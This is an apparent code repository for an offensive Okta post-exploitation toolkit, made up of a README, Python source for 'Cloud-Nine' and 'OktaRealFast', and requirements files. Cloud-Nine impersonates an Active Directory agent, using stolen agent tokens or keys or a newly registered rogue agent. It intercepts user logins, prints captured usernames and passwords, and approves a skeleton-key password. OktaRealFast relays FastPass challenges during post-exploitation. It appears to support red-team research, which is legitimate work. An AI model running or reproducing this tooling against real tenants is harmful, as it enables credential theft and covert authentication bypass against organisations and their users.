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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Info 2 | 3 | This repo contains projects to support the "Okta for Red Teamers" blog post [here](https://blog.xpnsec.com/okta-for-redteamers/). 4 | 5 | ## Cloud-Nine 6 | 7 | An Okta Agent tool which emulates an AD Agent, allows interception of authentication requests, and adding a skeleton key. 8 | 9 | ### Installation 10 | 11 | ``` 12 | python3 -m venv env 13 | source ./env/bin/activate 14 | pip install -r requirements.txt 15 | ``` 16 | 17 | ### Usage 18 | 19 | Three modes are supported: 20 | 21 | 1. Use a stolen AD Agent token (agent version < 3.18.0) to connect to Okta and intercept authentication requests: 22 | 23 | ```bash 24 | python ./main.py --tenant-domain example.okta.com --skeleton-key WibbleWobble99 token --api-token 0023452Lllk2KqjLBvaxANWEgTd7bqjsxjo8aZj0wd --app-id 0oa7c027u2TcJxoki697 --agent-id a537cnm9ldwPILkqP697 25 | ``` 26 | 27 | 2. Use a stolen AD Agent key (agent version >= 3.18.0) to connect to Okta and intercept authentication requests: 28 | 29 | ```bash 30 | python ./main.py --tenant-domain example.okta.com --skeleton-key WibbleWobble99 key --app-id 0o[...]7 --agent-id a5[...]7 --client-id wl[...]7 --agent-key '{"d":"LA[...]=","p":"1r[...]=","q":"xm[...]=","dp":"eo[...]=","dq":"Pr[...]=","qp":"Ae[...]=","n":"pm[...]=","e":"AQAB"}' 31 | ``` 32 | 33 | The `AppId`, `AgentId`, `ClientId` and `AgentKey` parameters can be found in the `OktaAgentService.exe.config` file. The `AgentKey` setting is, like the `AgentToken` in older versions, protected with the DPAPI master key of the account running the Okta AD Agent service. 34 | 35 | 3. Register a new AD Agent with Okta and intercept authentication requests: 36 | 37 | > Note: You'll need an OAuth Response Code which you can get from: 38 | 39 | ``` 40 | https://example.okta.com/oauth2/authorize?redirect_uri=%2Foauth-response&response_type=code&client_id=cappT0Hfy97F1BoO1UTR&prompt=select_account 41 | ``` 42 | 43 | Then we can pass this as an arg to: 44 | 45 | ```bash 46 | python ./main.py --tenant-domain example.okta.com --skeleton-key WibbleWobble99 oauth --machine-name DC01 --windows-domain lab.local --code OAUTH_CODE_HERE 47 | ``` 48 | 49 | ## OktaRealFast 50 | 51 | This is a proxy tool for validating Okta FastPass JWT's before forwarding them to a target host. 52 | 53 | The idea is simple.. it gives the ability to see if a popup is going to be presented to the user during post-exploitation. 54 | 55 | More information in the blog post https://blog.xpnsec.com/identity-providers-redteamers. 56 | 57 | ## malIDP 58 | 59 | This has been moved to its own repository at [https://github.com/xpn/malIDP](https://github.com/xpn/malIDP). 60 | 61 | -------------------------------------------------------------------------------- /cloud-nine/main.py: -------------------------------------------------------------------------------- 1 | import okta 2 | import re 3 | import signal 4 | import sys 5 | import argparse 6 | 7 | running = True 8 | 9 | def handler(signum, frame): 10 | global running 11 | running = False 12 | print("[!] Exiting.. please wait") 13 | 14 | signal.signal(signal.SIGINT, handler) 15 | 16 | def handleInboundAuth(okta_client, skeleton_key, action): 17 | action_response = action 18 | 19 | username = "" 20 | password = "" 21 | 22 | m = re.search("([^<]+)", action_response, re.IGNORECASE + re.MULTILINE) 23 | if m: 24 | if m.group(1) == "NONE": 25 | print("[*] PING received") 26 | return 27 | 28 | elif m.group(1) == "USER_AUTH": 29 | 30 | user = re.search("([^<]+)", action_response, re.IGNORECASE + re.MULTILINE) 31 | if user: 32 | username = user.group(1) 33 | print(f"[*] Username: {username}") 34 | 35 | pwd = re.search("([^<]+)", action_response, re.IGNORECASE + re.MULTILINE) 36 | if pwd: 37 | password = pwd.group(1) 38 | print(f"[*] Password: {password}") 39 | 40 | else: 41 | print("[*] Unsupported action received and ignored") 42 | return 43 | 44 | m = re.search("actionId=\"([^\"]+)", action_response, re.IGNORECASE + re.MULTILINE) 45 | if m: 46 | action_id = m.group(1) 47 | if skeleton_key != "" and password == skeleton_key: 48 | okta_client.send_action_result(action_id, True) 49 | else: 50 | okta_client.send_action_result(action_id, False) 51 | 52 | def runWithToken(tenant, skeleton_key, agent_id, app_id, api_key): 53 | with okta.OktaADAgent(tenant, agent_id=agent_id, app_id=app_id, api_key=api_key) as okta_client: 54 | while running: 55 | action_response = okta_client.start_action_listening() 56 | handleInboundAuth(okta_client, skeleton_key, action_response) 57 | 58 | def runWithOauth(tenant, skeleton_key, code, machine_name, domain_name): 59 | with okta.OktaADAgent(tenant, code=code, device_name=machine_name, domain=domain_name) as okta_client: 60 | while running: 61 | action_response = okta_client.start_action_listening() 62 | handleInboundAuth(okta_client, skeleton_key, action_response) 63 | 64 | def runWithKey(tenant, skeleton_key, agent_id, agent_key, client_id, app_id): 65 | with okta.OktaADAgent(tenant, agent_id=agent_id, agent_key=agent_key, client_id=client_id, app_id=app_id) as okta_client: 66 | while running: 67 | action_response = okta_client.start_action_listening() 68 | handleInboundAuth(okta_client, skeleton_key, action_response) 69 | 70 | 71 | if __name__ == "__main__": 72 | print("Cloud-Nine (OKTA Version)..\n\tby @_xpn_\n") 73 | 74 | parser = argparse.ArgumentParser(prog='PROG') 75 | parser.add_argument('--tenant-domain', help='Tenant Domain (example.okta.com)') 76 | parser.add_argument('--skeleton-key', required=False, help='Skeleton Key to use (Passw0rd123)') 77 | 78 | subparsers = parser.add_subparsers(help='sub-command help', dest='command') 79 | 80 | parser_a = subparsers.add_parser('token', help='Accepts a compromised Agent API Token') 81 | parser_a.add_argument('--api-token', required=True, help='Agent API Token') 82 | parser_a.add_argument('--agent-id', required=True, help='Agent ID') 83 | parser_a.add_argument('--app-id', required=True, help='App ID') 84 | 85 | parser_b = subparsers.add_parser('oauth', help='Creates a new Agent API Token using the OAuth flow') 86 | parser_b.add_argument('--code', required=True, help='Okta OAuth Code') 87 | parser_b.add_argument('--machine-name', required=True, help='Name of new Virtual DC Connector') 88 | parser_b.add_argument('--windows-domain', required=True, help='FQDN of the Windows Domain') 89 | 90 | parser_c = subparsers.add_parser('key', help='Accepts a compromised Agent API Key') 91 | parser_c.add_argument('--agent-id', required=True, help='Agent ID') 92 | parser_c.add_argument('--agent-key', required=True, help='Agent API Key') 93 | parser_c.add_argument('--client-id', required=True, help='Client ID') 94 | parser_c.add_argument('--app-id', required=True, help='App ID') 95 | 96 | args = parser.parse_args() 97 | 98 | # Check which mode we're in 99 | if args.command == "token": 100 | runWithToken(args.tenant_domain, args.skeleton_key, args.agent_id, args.app_id, args.api_token) 101 | 102 | elif args.command == "oauth": 103 | runWithOauth(args.tenant_domain, args.skeleton_key, args.code, args.machine_name, args.windows_domain) 104 | 105 | elif args.command == "key": 106 | runWithKey(args.tenant_domain, args.skeleton_key, args.agent_id, args.agent_key, args.client_id, args.app_id) 107 | 108 | else: 109 | print("[!] Invalid arguments") 110 | sys.exit(1) 111 | -------------------------------------------------------------------------------- /cloud-nine/okta.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import uuid 4 | import time 5 | import jwt 6 | import json 7 | from hashlib import sha256 8 | from base64 import b64decode, urlsafe_b64encode 9 | from Crypto.PublicKey import RSA 10 | 11 | USER_AGENT = "Okta AD Agent/3.18.0 (Microsoft Windows NT 6.2.9200.0; .NET CLR 4.0.30319.42000; 64-bit OS; 64-bit Process; sslpinning=disabled)" 12 | OKTA_CONNECTOR_CLIENT_ID = "cappT0Hfy97F1BoO1UTR" 13 | OKTA_API_OAUTH_TOKEN = "/oauth2/token" 14 | OKTA_API_OAUTH_V1_TOKEN = "/oauth2/v1/token" 15 | OKTA_API_CREATE_TOKEN = "/api/v1/tokens" 16 | OKTA_API_CREATE_DOMAIN = "/api/1/internal/app/activedirectory/" 17 | OKTA_API_INIT_AGENT = "/api/1/internal/app/activedirectory/[DOMAIN_ID]/agent?name=[HOSTNAME]" 18 | OKTA_API_CHECKIN_AGENT = "/api/1/internal/app/activedirectory/[DOMAIN_ID]/agent/[AGENT_ID]/actionResult?agentVersion=3.18.0.0" 19 | OKTA_API_ACTION = "/api/1/internal/app/activedirectory/[DOMAIN_ID]/agent/[AGENT_ID]/nextAction?agentVersion=3.18.0.0&pollid=[POLL_ID]" 20 | OKTA_API_ACTION_RESULT = "/api/1/internal/app/activedirectory/[DOMAIN_ID]/agent/[AGENT_ID]/actionResult?responseId=[RESPONSE_ID]" 21 | 22 | class OktaADAgent: 23 | def __init__(self, tenant: str, domain="", agent_id="", app_id="", client_id="", device_name="", code="", api_key="", agent_key=""): 24 | self._tenant = tenant 25 | self._api_key = api_key 26 | self._agent_key = json.loads(agent_key) if agent_key else "" 27 | self._domain = domain 28 | self._device_name = device_name 29 | self._code = code 30 | self._agent_id = agent_id 31 | self._app_id = app_id 32 | self._client_id = client_id 33 | if api_key: 34 | self._authorization_header = f"SSWS {api_key}" 35 | elif agent_key: 36 | print("[*] Generating JSON Web Key for Agent Key Method") 37 | self._jwk_rsa_key = RSA.generate(4096) 38 | self._jwk_kid = uuid.uuid4().hex 39 | self._authorization_header = f"DPoP {self._get_access_token()}" 40 | else: 41 | self._authorization_header = "" 42 | 43 | def _generate_dpop_header(self, htm, htu, nonce="", ath=""): 44 | nbf = int(time.time()) 45 | payload = { 46 | "htm": htm, 47 | "htu": htu, 48 | "nbf": nbf, 49 | "exp": nbf + 3600, 50 | "iat": nbf 51 | } 52 | if nonce: 53 | payload["nonce"] = nonce 54 | if ath: 55 | payload["ath"] = ath 56 | if ath or nonce: 57 | payload["jti"] = uuid.uuid4().hex 58 | 59 | int_to_b64 = lambda n: urlsafe_b64encode(n.to_bytes((n.bit_length() + 7) // 8)).decode().strip("=") 60 | 61 | return jwt.encode( 62 | payload, 63 | self._jwk_rsa_key.export_key(), 64 | algorithm="RS256", 65 | headers={ 66 | "typ": "dpop+jwt", 67 | "jwk": { 68 | "alg": "RS256", 69 | "e": int_to_b64(self._jwk_rsa_key.e), 70 | "kid": self._jwk_kid, 71 | "kty": "RSA", 72 | "n": int_to_b64(self._jwk_rsa_key.n), 73 | "use": "sig" 74 | } 75 | } 76 | ) 77 | 78 | def _get_access_token(self): 79 | headers = { 80 | "User-Agent": USER_AGENT, 81 | "DPoP": self._generate_dpop_header("POST", f"https://{self._tenant}{OKTA_API_OAUTH_V1_TOKEN}") 82 | } 83 | 84 | nbf = int(time.time()) 85 | payload = { 86 | "sub": self._client_id, 87 | "jti": uuid.uuid4().hex, 88 | "nbf": nbf, 89 | "exp": nbf + 1800, 90 | "iat": nbf, 91 | "iss": "urn:okta:agents:ad-agent", 92 | "aud": f"https://{self._tenant}" 93 | } 94 | 95 | int_agent_key = {param: int.from_bytes(b64decode(value)) for param, value in self._agent_key.items()} 96 | rsa_agent_key = RSA.construct(( 97 | int_agent_key["n"], 98 | int_agent_key["e"], 99 | int_agent_key["d"], 100 | int_agent_key["p"], 101 | int_agent_key["q"] 102 | )) 103 | 104 | agent_public_key_hash = sha256(b64decode(self._agent_key["e"]) + b64decode(self._agent_key["n"])).digest() 105 | kid = urlsafe_b64encode(agent_public_key_hash).decode().strip("=") 106 | 107 | assertion = jwt.encode( 108 | payload, 109 | rsa_agent_key.export_key(), 110 | algorithm="RS256", 111 | headers={ 112 | "kid": kid, 113 | "typ": "JWT" 114 | } 115 | ) 116 | 117 | data = { 118 | "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer", 119 | "scope": "okta.internal.adAgent.manage okta.internal.adAgent.read", 120 | "assertion": assertion 121 | } 122 | 123 | response = requests.post(f"https://{self._tenant}{OKTA_API_OAUTH_V1_TOKEN}", headers=headers, data=data) 124 | if response.json().get("error", "") != "use_dpop_nonce": 125 | raise RuntimeError("Nonce not required by the authorization server in the DPoP proof") 126 | 127 | headers["DPoP"] = self._generate_dpop_header( 128 | "POST", 129 | f"https://{self._tenant}{OKTA_API_OAUTH_V1_TOKEN}", 130 | nonce=response.headers["Dpop-Nonce"] 131 | ) 132 | response = requests.post(f"https://{self._tenant}{OKTA_API_OAUTH_V1_TOKEN}", headers=headers, data=data) 133 | if "access_token" not in response.json(): 134 | raise RuntimeError("Missing access token in the authorization server response") 135 | 136 | return response.json()["access_token"] 137 | 138 | def _check_authorization_header_expiry(self): 139 | if not self._authorization_header.startswith("DPoP"): 140 | return 141 | 142 | access_token = self._authorization_header.split()[1] 143 | exp = jwt.decode(access_token, options={"verify_signature": False})["exp"] 144 | if int(time.time()) + 60 > exp: 145 | self._authorization_header = f"DPoP {self._get_access_token()}" 146 | print("[*] Access token refreshed") 147 | 148 | def _create_ad_connector_token(self): 149 | ''' 150 | Creates a new AD Connector Token using the OAuth flow 151 | ''' 152 | 153 | headers = { 154 | "User-Agent": USER_AGENT 155 | } 156 | 157 | data = { 158 | "grant_type":"api_token", 159 | "code":self._code, 160 | "client_id":OKTA_CONNECTOR_CLIENT_ID 161 | } 162 | 163 | response = requests.post(f"https://{self._tenant}{OKTA_API_OAUTH_TOKEN}", headers=headers, data=data) 164 | jsonResponse = response.json() 165 | 166 | if "api_token" in jsonResponse: 167 | self._authorization_header = f"SSWS {jsonResponse['api_token']}" 168 | 169 | return jsonResponse["api_token"] 170 | 171 | def _create_ad_domain(self): 172 | ''' 173 | Creates a new AD Domain via the Okta Internal API 174 | If AD Domain already exists, the domain ID is retrieved 175 | ''' 176 | 177 | data = f'' 178 | headers = { 179 | "User-Agent": USER_AGENT, 180 | "Content-Type":"application/xml; charset=utf-8", 181 | "Authorization": self._authorization_header 182 | } 183 | 184 | response = requests.post(f"https://{self._tenant}{OKTA_API_CREATE_DOMAIN}", headers=headers, data=data) 185 | text = response.text 186 | matches = re.search('id="([^"]+)', text, re.IGNORECASE + re.MULTILINE) 187 | if matches: 188 | self._app_id = matches.group(1) 189 | 190 | return self._app_id 191 | 192 | def _init_ad_agent(self): 193 | ''' 194 | Initialises the AD Agent Name with Okta 195 | ''' 196 | 197 | headers = { 198 | "User-Agent": USER_AGENT, 199 | "Content-Type":"application/xml; charset=utf-8", 200 | "Authorization": self._authorization_header 201 | } 202 | 203 | url = OKTA_API_INIT_AGENT.replace("[DOMAIN_ID]", self._app_id).replace("[HOSTNAME]", self._device_name) 204 | 205 | response = requests.post(f"https://{self._tenant}{url}", headers=headers) 206 | text = response.text 207 | 208 | matches = re.search('id="([^"]+)', text, re.IGNORECASE + re.MULTILINE) 209 | if matches: 210 | self._agent_id = matches.group(1) 211 | 212 | return self._agent_id 213 | 214 | def _checkin_ad_agent(self): 215 | ''' 216 | Checks in the AD Agent, essentially marking it as ready to receive requests 217 | ''' 218 | 219 | headers = { 220 | "User-Agent": USER_AGENT, 221 | "Content-Type":"application/xml; charset=utf-8", 222 | "Authorization": self._authorization_header 223 | } 224 | 225 | data = f""" 226 | INIT 227 | SUCCESS 228 | 229 | 230 | 231 | 232 | {int(time.time())} 233 | 00010101000000.000Z 234 | 00010101000000.000Z 235 | 00010101000000.000Z 236 | 20221210221429.278Z 237 | 238 | {{}} 239 | """ 240 | 241 | url = OKTA_API_CHECKIN_AGENT.replace("[DOMAIN_ID]", self._app_id).replace("[AGENT_ID]", self._agent_id) 242 | response = requests.post(f"https://{self._tenant}{url}", headers=headers, data=data) 243 | return response.text 244 | 245 | def start_action_listening(self): 246 | url = OKTA_API_ACTION.replace("[DOMAIN_ID]", self._app_id).replace("[AGENT_ID]", self._agent_id).replace("[POLL_ID]", str(uuid.uuid4())) 247 | 248 | self._check_authorization_header_expiry() 249 | headers = { 250 | "User-Agent": USER_AGENT, 251 | "Content-Type":"application/xml; charset=utf-8", 252 | "Authorization": self._authorization_header 253 | } 254 | 255 | if self._authorization_header.startswith("DPoP"): 256 | access_token_hash = sha256(self._authorization_header.split()[1].encode()).digest() 257 | headers["DPoP"] = self._generate_dpop_header( 258 | "GET", 259 | f"https://{self._tenant}{url.split('?')[0]}", 260 | ath=urlsafe_b64encode(access_token_hash).decode().strip("=") 261 | ) 262 | 263 | response = requests.get(f"https://{self._tenant}{url}", headers=headers) 264 | return response.text 265 | 266 | def send_action_result(self, action_id: str, success=False): 267 | if success: 268 | status = "SUCCESS" 269 | message = "" 270 | error_code = "" 271 | else: 272 | status = "FAILURE" 273 | message = "Login Failed" 274 | error_code = "1326" 275 | 276 | r = re.search(":([^:]+):$", action_id, re.IGNORECASE + re.MULTILINE) 277 | if r: 278 | response_id = r.group(1) 279 | 280 | else: 281 | response_id = "" 282 | 283 | data = f""" 284 | USER_AUTH 285 | {status} 286 | {message} 287 | {error_code} 288 | 289 | {int(time.time())} 290 | {int(time.time())} 291 | {int(time.time())} 292 | {int(time.time())} 293 | 20221211205617.898Z 294 | 20221211205617.898Z 295 | 20221211205617.898Z 296 | 20221211205617.914Z 297 | 298 | {{"ExecutionTime":"12","AgentUpTime":"0 day(s) 22:41:49","DC":"DC01.lab.local","DomainControllerFunctionality":"WIN2016","DomainFunctionality":"WIN2016","ForestFunctionality":"WIN2016","LdapResponseTime":"0"}} 299 | """ 300 | 301 | url = OKTA_API_ACTION_RESULT.replace("[DOMAIN_ID]", self._app_id).replace("[AGENT_ID]", self._agent_id).replace("[RESPONSE_ID]", response_id) 302 | 303 | self._check_authorization_header_expiry() 304 | headers = { 305 | "User-Agent": USER_AGENT, 306 | "Content-Type":"application/xml; charset=utf-8", 307 | "Authorization": self._authorization_header 308 | } 309 | 310 | if self._authorization_header.startswith("DPoP"): 311 | access_token_hash = sha256(self._authorization_header.split()[1].encode()).digest() 312 | headers["DPoP"] = self._generate_dpop_header( 313 | "POST", 314 | f"https://{self._tenant}{url.split('?')[0]}", 315 | ath=urlsafe_b64encode(access_token_hash).decode().strip("=") 316 | ) 317 | 318 | response = requests.post(f"https://{self._tenant}{url}", headers=headers, data=data) 319 | return response.text 320 | 321 | def __enter__(self): 322 | 323 | # Create our AD connector 324 | if self._api_key: 325 | print("[*] Using Agent Token Method") 326 | return self 327 | elif self._agent_key: 328 | print("[*] Using Agent Key Method") 329 | return self 330 | 331 | print("[*] Creating Agent Token") 332 | token = self._create_ad_connector_token() 333 | print(f"[*] Token Created: {token}") 334 | 335 | print("[*] Getting Domain ID") 336 | domain_id = self._create_ad_domain() 337 | print(f"[*] Domain ID is {domain_id}") 338 | 339 | print("[*] Initialising AD Agent") 340 | agent_id = self._init_ad_agent() 341 | print(f"[*] Agent ID is {agent_id}") 342 | 343 | print("[*] Sending Agent Checkin") 344 | self._checkin_ad_agent() 345 | 346 | return self 347 | 348 | def __exit__(self, *args): 349 | pass 350 | 351 | -------------------------------------------------------------------------------- /cloud-nine/requirements.txt: -------------------------------------------------------------------------------- 1 | aiohttp==3.8.3 2 | aiosignal==1.3.1 3 | async-timeout==4.0.2 4 | attrs==22.1.0 5 | certifi==2023.7.22 6 | charset-normalizer==2.1.1 7 | frozenlist==1.3.3 8 | idna==3.4 9 | multidict==6.0.3 10 | pycryptodome==3.20.0 11 | pyjwt[crypto]==2.8.0 12 | requests==2.31.0 13 | urllib3==2.0.4 14 | yarl==1.8.2 15 | -------------------------------------------------------------------------------- /oktarealfast/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xpn/OktaPostExToolkit/d8c7b8a6fa8d7e474a1f0fbd3bac94bfac4c292a/oktarealfast/lib/__init__.py -------------------------------------------------------------------------------- /oktarealfast/lib/okta.py: -------------------------------------------------------------------------------- 1 | import http.client 2 | import urllib.parse 3 | import random 4 | import string 5 | import hashlib 6 | import base64 7 | import re 8 | import json 9 | import pprint 10 | import jwt 11 | 12 | class Okta: 13 | def __init__(self, host): 14 | self.host = host 15 | self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36" 16 | 17 | @staticmethod 18 | def parseStateToken(state_token): 19 | # parse the state_token JWT and grab the "keyTypes" in the token which will tell us the prompt that the user is likely to get 20 | # the keyTypes are the authenticator types that the user has registered 21 | # the prompt will be the first keyType in the list 22 | 23 | # decode the JWT 24 | decoded = jwt.decode(state_token, verify=False, options={"verify_signature": False}) 25 | 26 | # grab the keyTypes 27 | key_types = decoded["keyTypes"] 28 | user_mediation = decoded["userMediation"] 29 | user_verification = decoded["userVerification"] 30 | 31 | return (key_types, user_mediation, user_verification) 32 | -------------------------------------------------------------------------------- /oktarealfast/main.py: -------------------------------------------------------------------------------- 1 | from urllib import response 2 | import flask 3 | from flask import request, make_response 4 | import lib.okta as okta 5 | import requests 6 | import sys 7 | 8 | host = "" 9 | http_proxy = "" 10 | 11 | app = flask.Flask(__name__) 12 | 13 | @app.route('/probe', methods=['GET', 'OPTIONS']) 14 | def probe(): 15 | if request.method == 'OPTIONS': 16 | response = make_response() 17 | response.headers.add("Access-Control-Allow-Origin", host) 18 | response.headers.add("Access-Control-Allow-Methods", "GET, OPTIONS, POST, HEAD") 19 | response.headers.add("Access-Control-Allow-Headers", "x-okta-xsrftoken, Origin, X-Requested-With, Content-Type, Accept") 20 | response.headers.add("Access-Control-Request-Headers", "content-type,x-okta,xsrftoken") 21 | return response 22 | 23 | response = make_response() 24 | response.headers.add("Access-Control-Allow-Origin", host) 25 | response.headers.add("Access-Control-Allow-Methods", "GET, OPTIONS, POST, HEAD") 26 | response.headers.add("Access-Control-Allow-Headers", "x-okta-xsrftoken, Origin, X-Requested-With, Content-Type, Accept") 27 | response.headers.add("Access-Control-Request-Headers", "content-type,x-okta,xsrftoken") 28 | return response 29 | 30 | @app.route('/challenge', methods=['POST', 'OPTIONS']) 31 | def challenge(): 32 | if request.method == 'OPTIONS': 33 | response = make_response() 34 | response.headers.add("Access-Control-Allow-Origin", host) 35 | response.headers.add("Access-Control-Allow-Methods", "GET, OPTIONS, POST, HEAD") 36 | response.headers.add("Access-Control-Allow-Headers", "x-okta-xsrftoken, Origin, X-Requested-With, Content-Type, Accept") 37 | response.headers.add("Access-Control-Request-Headers", "content-type,x-okta,xsrftoken") 38 | return response 39 | 40 | # Get POST data 41 | data = request.get_json() 42 | 43 | # Parse the challenge 44 | challenge_request = data["challengeRequest"] 45 | challenges = okta.Okta.parseStateToken(challenge_request) 46 | 47 | verification = False 48 | 49 | if len(challenges[0]) == 2: 50 | verification = True 51 | 52 | if challenges[1] != "OPTIONAL": 53 | verification = True 54 | 55 | if challenges[2] != "NONE": 56 | verification = True 57 | 58 | if verification: 59 | print("[*] Verification request is present, user will receieve a prompt\n") 60 | 61 | if not verification: 62 | print("[*] No challenges present, user will not receive any notifications\n") 63 | 64 | # Hit enter to continue 65 | input("Press enter to continue\n") 66 | 67 | # Forward the challenge to the Okta agent over SOCKS 68 | resp = requests.post("http://localhost:8769/challenge", json=data, headers=request.headers, proxies={"http": http_proxy, "https": http_proxy}) 69 | 70 | response = make_response() 71 | response.headers.add("Access-Control-Allow-Origin", host) 72 | response.headers.add("Access-Control-Allow-Methods", "GET, OPTIONS, POST, HEAD") 73 | response.headers.add("Access-Control-Allow-Headers", "x-okta-xsrftoken, Origin, X-Requested-With, Content-Type, Accept") 74 | response.headers.add("Access-Control-Request-Headers", "content-type,x-okta,xsrftoken") 75 | return response 76 | 77 | if __name__ == '__main__': 78 | if len(sys.argv) != 3: 79 | print("Usage: python ./main.py ") 80 | print("Example: python ./main.py https://companyname.okta.com socks4://localhost:9090") 81 | sys.exit(1) 82 | 83 | host = sys.argv[1] 84 | http_proxy = sys.argv[2] 85 | 86 | import logging 87 | log = logging.getLogger('werkzeug') 88 | log.setLevel(logging.ERROR) 89 | app.run(debug=False, port=8769) 90 | 91 | -------------------------------------------------------------------------------- /oktarealfast/requirements.txt: -------------------------------------------------------------------------------- 1 | blinker==1.7.0 2 | certifi==2024.2.2 3 | charset-normalizer==3.3.2 4 | click==8.1.7 5 | flask==3.0.2 6 | idna==3.6 7 | importlib-metadata==7.0.1 8 | itsdangerous==2.1.2 9 | Jinja2==3.1.3 10 | MarkupSafe==2.1.5 11 | PyJWT==2.8.0 12 | PySocks==1.7.1 13 | requests==2.31.0 14 | urllib3==2.2.0 15 | werkzeug==3.0.1 16 | zipp==3.17.0 --------------------------------------------------------------------------------